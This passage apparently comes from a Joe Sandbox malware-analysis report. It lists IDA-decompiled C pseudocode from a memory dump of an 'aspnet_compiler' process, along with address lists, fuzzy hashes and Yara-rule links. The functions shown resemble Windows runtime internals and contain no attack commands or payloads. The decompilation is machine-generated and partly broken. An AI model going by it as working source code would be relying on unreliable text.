								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L010F4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x010e7672
0x010e767f
0x010e7689
0x010e76de
0x010e76de
0x010e768b
0x010e7691
0x010e7693
0x010e7697
0x00000000
0x010e7699
0x010e76a8
0x00000000
0x010e76aa
0x010e76ad
0x010e76b1
0x00000000
0x010e76b3
0x010e76b3
0x010e76b5
0x010e76ba
0x010e76bc
0x010e76bc
0x010e76c0
0x00000000
0x010e76c2
0x010e76ce
0x010e76ce
0x010e76c0
0x010e76b1
0x010e76a8
0x010e7697
0x010e76d9

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: 23a14f38ac7260c32cc10a171f68aa917480d67ae6616e9fb89472155843c4b4
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: 8F01883270011AAFD731AE5FDC45E9B7BEDEB88664B180564BB48CB290DA70DD01CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0116C450 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0116C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E01119910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E011195B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E011195D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E011195D0();
				return L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}

0x0116c458
0x0116c45d
0x0116c466
0x0116c468
0x0116c469
0x0116c46a
0x0116c46b
0x0116c46e
0x0116c46f
0x0116c471
0x0116c476
0x0116c476
0x0116c47c
0x0116c47e
0x0116c480
0x0116c480
0x0116c483
0x0116c484
0x0116c486
0x0116c488
0x0116c48f
0x0116c491
0x0116c493
0x0116c493
0x0116c48f
0x0116c498
0x0116c49e
0x0116c4ad
0x0116c4ad
0x0116c4b2
0x0116c4b4
0x0116c4cd

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction ID: d7779745e2b79079576ac64b139e8a2ac3f699e77a742c6ea1691cf291dff40a
Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
Instruction Fuzzy Hash: 0F01B97114050ABFE715AF69CC90EA2FB6DFF54394F004535F25452560CB32ECA1CAE0

Uniqueness

Uniqueness Score: -1.00%

Function 010D9080 Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E010D9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x11c85ec;
				E010F2280(_t48, 0x11c85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E010EFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x11c538c; // 0x77e46828
					if( *_t84 != 0x11c5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x11af6e8);
						E0112D0E8(0x11c85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E011A88F5(_t80, _t85, 0x11c5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x11c86c0; // 0xe107b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x11c86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E010F2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E011A88F5(0x11c85ec, _t85, 0x11c5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0111AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x11cb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x11c84c0;
																			if(_t82 >=  *0x11c84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E011A9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E010D922A(_t99);
										_t64 = E010F7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E011A8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x11c86c0; // 0xe107b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x11c86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x11c86bc;
													_t87 = 0x11c86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E010D9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x11c86c4;
												_t87 = 0x11c86c0;
												L27:
												E01109B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0112D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x11c5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x11c538c = _t51;
						goto L6;
					}
				}
			}

0x010d9082
0x010d9083
0x010d9084
0x010d9085
0x010d9087
0x010d9096
0x010d9098
0x010d9098
0x010d909e
0x010d90a8
0x010d90e7
0x010d90e7
0x010d90aa
0x010d90b0
0x010d90b7
0x010d90bd
0x010d90dd
0x010d90e6
0x010d90bf
0x010d90bf
0x010d90c7
0x010d90cf
0x010d90f1
0x010d90f2
0x010d90f4
0x010d90f5
0x010d90f6
0x010d90f7
0x010d90f8
0x010d90f9
0x010d90fa
0x010d90fb
0x010d90fc
0x010d90fd
0x010d90fe
0x010d90ff
0x010d9100
0x010d9102
0x010d9107
0x010d910c
0x010d9110
0x010d9113
0x010d9115
0x010d9136
0x010d913f
0x010d9143
0x011337e4
0x011337e4
0x010d9117
0x010d9117
0x010d911d
0x00000000
0x010d911f
0x010d911f
0x010d9125
0x00000000
0x010d9127
0x010d912d
0x010d9130
0x010d9134
0x010d9158
0x010d915d
0x010d9161
0x010d9168
0x01133715
0x010d916e
0x010d916e
0x010d9175
0x010d9177
0x010d917e
0x010d917f
0x010d9182
0x010d9182
0x010d9187
0x010d9187
0x010d918a
0x010d918d
0x010d918f
0x010d9192
0x010d9195
0x010d9198
0x010d9198
0x010d9198
0x010d919a
0x00000000
0x00000000
0x0113371f
0x01133721
0x01133727
0x0113372f
0x01133733
0x01133735
0x01133738
0x0113373b
0x0113373d
0x01133740
0x00000000
0x01133746
0x01133746
0x01133749
0x00000000
0x0113374f
0x0113374f
0x01133751
0x01133757
0x01133759
0x0113375c
0x0113375c
0x0113375e
0x0113375e
0x01133761
0x01133764
0x00000000
0x00000000
0x01133766
0x01133768
0x011337a3
0x011337a3
0x011337a5
0x011337a7
0x011337ad
0x011337b0
0x011337b2
0x011337bc
0x011337c2
0x011337c2
0x011337b2
0x010d9187
0x010d9187
0x010d918a
0x010d918d
0x010d918f
0x010d9192
0x010d9195
0x00000000
0x010d9195
0x00000000
0x0113376a
0x0113376a
0x0113376a
0x0113376c
0x0113376c
0x0113376f
0x01133775
0x00000000
0x00000000
0x01133777
0x01133779
0x01133782
0x01133787
0x01133789
0x01133790
0x01133790
0x0113378b
0x0113378b
0x0113378b
0x01133792
0x01133795
0x00000000
0x01133795
0x00000000
0x01133779
0x01133798
0x00000000
0x01133798
0x00000000
0x01133768
0x0113379b
0x0113379b
0x01133751
0x01133749
0x00000000
0x01133740
0x010d91a0
0x010d91a3
0x010d91a9
0x010d91b0
0x00000000
0x010d91b0
0x010d9187
0x010d91b4
0x010d91b4
0x010d91bb
0x010d91c0
0x010d91c5
0x010d91c7
0x011337da
0x010d91cd
0x010d91cd
0x010d91cd
0x010d91d2
0x010d91d5
0x010d9239
0x010d9239
0x010d91d7
0x010d91db
0x010d91e1
0x010d91e7
0x010d91fd
0x010d9203
0x010d921e
0x010d9223
0x00000000
0x010d9205
0x010d9205
0x010d9208
0x010d920c
0x010d9214
0x010d9214
0x010d920c
0x010d91e9
0x010d91e9
0x010d91ee
0x010d91f3
0x010d91f3
0x010d91f3
0x010d91e7
0x00000000
0x00000000
0x00000000
0x010d9134
0x010d9125
0x010d911d
0x010d914e
0x010d90d1
0x010d90d1
0x010d90d3
0x010d90d6
0x010d90d8
0x00000000
0x010d90d8
0x010d90cf

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1f76bd10fe185c2361abdceba4791e66e52df5225ff2c787a1e28653f95f547
Instruction ID: 10eaf11ff037f1fd8e31aea2d60e0c4c4b240d6e2f0caae101b02a6592508c9c
Opcode Fuzzy Hash: a1f76bd10fe185c2361abdceba4791e66e52df5225ff2c787a1e28653f95f547
Instruction Fuzzy Hash: 8001F4726053009FC3698F08E840B117FE9EF95724F25806AF6419B692C374EC81CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 011A4015 Relevance: .0, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E011A4015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E010F2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E010F2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x11c86ac);
					E010DF900(0x11c86d4, _t28);
					E010EFFB0(0x11c86ac, _t28, 0x11c86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E010EFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}

0x011a401a
0x011a401e
0x011a4023
0x011a4028
0x011a4029
0x011a402b
0x011a402f
0x011a4043
0x011a4046
0x011a4051
0x011a4057
0x011a405f
0x011a4062
0x011a4067
0x011a406f
0x011a407c
0x011a407c
0x011a408c
0x011a408c
0x011a4097

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b586fb99a4c827d030b1f9713f0d73523600f6cf6d1e9f02e0b78448e5207719
Instruction ID: c498fec5606d75c9e08e0b41dcf6325efdd9ecea03e13fece5511c45b1e0ba80
Opcode Fuzzy Hash: b586fb99a4c827d030b1f9713f0d73523600f6cf6d1e9f02e0b78448e5207719
Instruction Fuzzy Hash: 9C01A7712416467FD255AF79CE85ED3F7ACFF65650B000229F64883E51CB24EC11C6E4

Uniqueness

Uniqueness Score: -1.00%

Function 011914FB Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E011914FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x11cd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0111FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E010F7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0111B640(E01119AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x011914fb
0x011914fb
0x0119150a
0x01191514
0x01191519
0x0119151b
0x01191526
0x0119152c
0x01191534
0x01191537
0x0119153a
0x01191545
0x01191557
0x01191547
0x01191550
0x01191550
0x01191562
0x01191563
0x01191565
0x0119156a
0x0119157f

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 021d485edc5e99bd9715e5837a9f9b25d2b89d5c9aee1cdacfd75d15117c2b31
Instruction ID: e78684f884595b45a5bf1c3f84a8ff1fc551c2b487b6483d458505a4cba4b691
Opcode Fuzzy Hash: 021d485edc5e99bd9715e5837a9f9b25d2b89d5c9aee1cdacfd75d15117c2b31
Instruction Fuzzy Hash: 8601B571A0025DAFDB18DFA8D841EAEBBB8EF45710F444066F914EB380D774DA41CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0119138A Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0119138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x11cd360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0111FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E010F7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0111B640(E01119AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x0119138a
0x0119138a
0x01191399
0x011913a3
0x011913a8
0x011913aa
0x011913b5
0x011913bb
0x011913c3
0x011913c6
0x011913c9
0x011913d4
0x011913e6
0x011913d6
0x011913df
0x011913df
0x011913f1
0x011913f2
0x011913f4
0x011913f9
0x0119140e

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeec13897dcca107856669b7d0f88b046b248cf7b583e557b12bbe385f77eb29
Instruction ID: b78cdc64dbb394901a6a4c38ca2fe496f8ecdf83e69626be78e4c5fc14d9cc21
Opcode Fuzzy Hash: aeec13897dcca107856669b7d0f88b046b248cf7b583e557b12bbe385f77eb29
Instruction Fuzzy Hash: 53019271A04219AFCB18DFA8D841EAEBBB8EF44710F404066B914EB280D7749A41C795

Uniqueness

Uniqueness Score: -1.00%

Function 010D58EC Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E010D58EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x11cd360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x10b5c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E010D5943() != 0 &&  *0x11c5320 > 5) {
					E01157B5E( &_v44, _t27);
					_t22 =  &_v28;
					E01157B5E( &_v28, _t28);
					_t11 = E01157B9C(0x11c5320, 0x10bbf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0111B640(_t11, _t17, _v8 ^ _t29, 0x10bbf15, _t27, _t28);
			}

0x010d58fb
0x010d58fe
0x010d5906
0x010d590a
0x010d593c
0x010d593c
0x010d590c
0x010d590c
0x010d5911
0x00000000
0x010d5913
0x010d5913
0x010d5913
0x010d5911
0x010d591d
0x01131035
0x0113103c
0x0113103f
0x01131056
0x01131056
0x010d593b

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a67aa616ee27eb46fb4304d3a64f89a3cee87fad362a40a41b8dd61e855a9a
Instruction ID: 5853669e8f76323fc277c8b51e30e4e97cf8ca51728287933d82b6d1206b802d
Opcode Fuzzy Hash: a0a67aa616ee27eb46fb4304d3a64f89a3cee87fad362a40a41b8dd61e855a9a
Instruction Fuzzy Hash: F901F731B00209EBD758DA28DC019AEBBB9EF41160F8400A9DD55A7284DF30DD02C794

Uniqueness

Uniqueness Score: -1.00%

Function 010EB02A Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010EB02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E010F7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E01157016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x010eb037
0x010eb039
0x010eb03b
0x010eb040
0x0113a60e
0x00000000
0x00000000
0x0113a61d
0x010eb04b
0x010eb04e
0x0113a627
0x0113a634
0x00000000
0x00000000
0x0113a641
0x0113a653
0x0113a643
0x0113a64c
0x0113a64c
0x0113a65b
0x00000000
0x00000000
0x00000000
0x0113a66c
0x010eb057
0x010eb057
0x010eb057
0x010eb046
0x010eb046
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: b3b62a022ff2cbab4f88fb1d678b61c59465658ccf3432ad65f5702b366207ef
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: FA018472205584DFE336C75DD948F667BE8EF85754F0900A1FA55CBAA1D728EC40C621

Uniqueness

Uniqueness Score: -1.00%

Function 011A1074 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E011A1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E011A165E(__ebx, 0x11c8ae4, (__edx -  *0x11c8b04 >> 0x14) + (__edx -  *0x11c8b04 >> 0x14), __edi, __ecx, (__edx -  *0x11c8b04 >> 0x14) + (__edx -  *0x11c8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E0119AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E010F7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E0118FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x011a1074
0x011a1080
0x011a1082
0x011a108a
0x011a108f
0x011a1093
0x011a10ab
0x011a10ab
0x011a10c3
0x011a10cf
0x011a10e1
0x011a10d1
0x011a10da
0x011a10da
0x011a10e9
0x011a10f5
0x011a10f5
0x011a10fe

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f84a10eccdfcb5d5e5c4a2a1a8f3db3ffd2b48543b1f656982503e521176ddd2
Instruction ID: 01ed994e965412e06bf32cdb30ec401f58260337a0105c24b3bdff4b74b49cdb
Opcode Fuzzy Hash: f84a10eccdfcb5d5e5c4a2a1a8f3db3ffd2b48543b1f656982503e521176ddd2
Instruction Fuzzy Hash: AA012476604742AFC718EF28CA40B1ABFE5AB94214F44C629F995836D0EF30D841CB92

Uniqueness

